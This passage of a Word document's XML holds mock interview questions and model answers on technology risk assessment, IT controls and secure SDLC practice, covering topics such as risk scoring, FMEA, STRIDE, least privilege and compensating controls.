        <w:t>A: I define likelihood and impact scales, score each risk consistently, and plot them on a matrix such as low, medium, high, and critical. The heat map should show which risks need immediate action versus monitoring. I use it for leadership communication, but I always support it with details because heat maps can oversimplify complex risk.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>---------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 27 - Technology Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through a risk assessment for deploying a new cloud application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I review the business purpose, data classification, architecture, identity model, network exposure, dependencies, CI/CD flow, logging, backup, DR, and operational ownership. I identify risks such as public exposure, weak IAM, secrets leakage, missing monitoring, and rollback gaps. Then I score the risks, define controls, agree release gates, and ensure evidence exists before production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you identify technology risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I identify risks through architecture reviews, threat modeling, control testing, vulnerability scans, cloud posture tools, audit findings, incident reviews, access reviews, change reviews, and interviews with engineering teams. I also look for patterns such as manual changes, unclear ownership, missing logs, weak approval workflows, and excessive privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What techniques do you use for risk identification?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use architecture review, STRIDE threat modeling, control gap analysis, FMEA, scenario analysis, audit walkthroughs, cloud security posture review, incident trend analysis, and dependency mapping. For cloud platforms, I also inspect IAM, network paths, encryption, logging, CI/CD controls, Terraform state, and data flows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is qualitative vs quantitative risk analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Qualitative analysis uses categories such as low, medium, high, and critical based on expert judgment. Quantitative analysis estimates risk in financial or numeric terms, such as expected loss, outage cost, or probability. In most technology risk work I use qualitative scoring first, then quantitative analysis for high-impact decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain likelihood and impact scoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Likelihood measures how probable a risk event is, while impact measures the business damage if it happens. Impact can include financial loss, downtime, data exposure, regulatory impact, customer harm, and reputational damage. A risk with high impact and high likelihood should receive urgent remediation or executive attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you calculate risk severity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A common method is likelihood multiplied by impact, using a defined scoring scale. I also adjust severity based on control maturity, exploitability, exposure, asset criticality, and data sensitivity. For example, an overprivileged service account in production with customer data access is more severe than the same issue in a test project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is FMEA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: FMEA stands for Failure Mode and Effects Analysis. It identifies how a process or system can fail, the effect of each failure, the cause, existing controls, and the priority for action. In cloud risk, I might use FMEA to assess deployment failure modes such as bad configuration, secret leakage, failed rollback, or capacity exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is scenario analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scenario analysis evaluates realistic risk events and their consequences. For example, "What happens if a public bucket exposes customer data?" or "What if Terraform state is modified incorrectly?" It helps teams think beyond control checklists and understand business impact, response steps, recovery plans, and control gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain risk acceptance, avoidance, mitigation, and transfer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risk acceptance means leadership knowingly accepts residual risk. Avoidance means stopping the risky activity. Mitigation means reducing likelihood or impact through controls. Transfer means shifting some risk through insurance, contracts, or vendors. For critical technology risks, mitigation is usually preferred unless there is a documented business reason for acceptance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Give an example of a risk you mitigated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong example would be overprivileged cloud service accounts. I would identify risky permissions through IAM analysis and audit logs, map actual usage, replace broad roles with least-privilege custom roles, remove unused keys, enforce Workload Identity, add monitoring for privilege changes, and track the remediation as a measurable reduction in access risk.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-----------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 28 - IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What are preventive controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Preventive controls stop a risk event before it occurs. Examples include least-privilege IAM, policy-as-code checks, required approvals, network restrictions, encryption requirements, branch protection, and admission policies. In cloud environments, preventive controls are valuable because they reduce dependency on manual review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are detective controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Detective controls identify when something risky has happened. Examples include audit logs, SIEM alerts, Cloud Logging, vulnerability scans, drift detection, access review reports, and anomaly detection. They do not prevent the issue directly, but they reduce detection time and support investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are corrective controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Corrective controls restore the environment or reduce damage after a risk event. Examples include incident response, automated rollback, patching, secret rotation, access revocation, backup restoration, and post-incident remediation. Good corrective controls reduce recovery time and prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Give examples of each control type in cloud infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Preventive controls stop an issue before it happens - org policies blocking public IPs, IAM least-privilege bindings, required CI/CD approvals. Detective controls identify issues after the fact - Security Command Center findings, audit logging, anomaly detection alerts. Corrective controls fix an identified issue - automated remediation scripts, incident response runbooks, patch deployment. A mature cloud security posture layers all three together for each major risk area rather than relying on preventive controls alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How do you validate control effectiveness?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I validate effectiveness by checking evidence, testing the control, reviewing logs, sampling transactions, and confirming that failures are detected and remediated. For example, for deployment approval, I would inspect pipeline configuration, recent deployment records, approval evidence, exception handling, and whether unauthorized deployments are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is segregation of duties?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Segregation of duties means no single person should control an end-to-end sensitive process without oversight. For example, the same developer should not be able to write code, approve it, deploy to production, and change production access without review. In CI/CD, this can be enforced through branch protection, approvals, and limited production permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is least privilege?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Least privilege means granting only the permissions needed to perform a task and nothing more. It reduces blast radius if an account or workload is compromised.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Least Privilege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 Explain RBAC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC stands for Role-Based Access Control. It assigns permissions through roles mapped to users, groups, or service accounts. In Kubernetes, RBAC uses Roles, ClusterRoles, RoleBindings, and ClusterRoleBindings. Good RBAC design separates admin, developer, CI/CD, read-only, and security responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What are compensating controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Compensating controls are alternative controls used when the preferred control is not feasible. For example, if a legacy system cannot support MFA, compensating controls could include VPN restriction, privileged access monitoring, short-lived credentials, strong logging, and frequent access reviews. They should be documented and time-bound.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you monitor control failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IT Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I monitor control failures through alerts, dashboards, exception reports, audit logs, periodic control testing, and ticket workflows. Examples include failed backup jobs, disabled logging, policy violations, expired certificates, unpatched systems, or overdue access reviews. Control failures should have owners, severity, SLA, and escalation paths.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>---------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 29 - SDLC and Secure Development Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you integrate risk into SDLC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I integrate risk at each phase: requirements, design, development, testing, release, and operations. During requirements, I review data and regulatory impact. During design, I review architecture and threats. During build, I use secure coding, scanning, and peer review. Before release, I check controls, evidence, rollback, monitoring, and ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What risks should be reviewed during BRD/PRD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I review data sensitivity, business criticality, customer impact, regulatory needs, authentication, authorization, integrations, third-party dependencies, availability requirements, logging, retention, and operational support. Early review prevents expensive rework after design or implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you review architecture from a risk perspective?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I review identity, data flows, trust boundaries, network exposure, encryption, logging, resilience, dependencies, secrets, deployment process, and operational ownership. I ask what can fail, what can be abused, how it will be detected, how it will be recovered, and who owns each control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What security controls should exist before production deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Required controls include strong IAM, secrets management, encryption, vulnerability scanning, secure CI/CD, approval gates, logging, monitoring, alerting, backup and restore, rollback plan, network restrictions, data protection, and incident runbooks. For regulated systems, evidence and control sign-off should be captured before release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain Secure SDLC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secure SDLC embeds security and risk controls throughout software delivery instead of checking at the end. It includes secure requirements, threat modeling, secure coding, code review, SAST, dependency scanning, container scanning, secrets detection, DAST where relevant, release approvals, and post-production monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What are threat modeling techniques?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common techniques include STRIDE, attack trees, data flow diagrams, abuse cases, and kill chain analysis. I use threat modeling to identify how a system can be attacked or misused, especially across trust boundaries like internet entry points, APIs, service accounts, and data stores.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is STRIDE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: STRIDE is a threat modeling framework: Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. It helps systematically identify threats and map them to controls such as authentication, integrity checks, logging, encryption, rate limiting, and least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is attack surface?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SDLC/Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Attack surface is the total set of entry points or weaknesses an attacker could use. Examples include public endpoints, APIs, service accounts, open ports, CI/CD secrets, admin consoles, and third-party integrations. Reducing attack surface means removing unnecessary exposure and hardening what remains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is shift-left security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
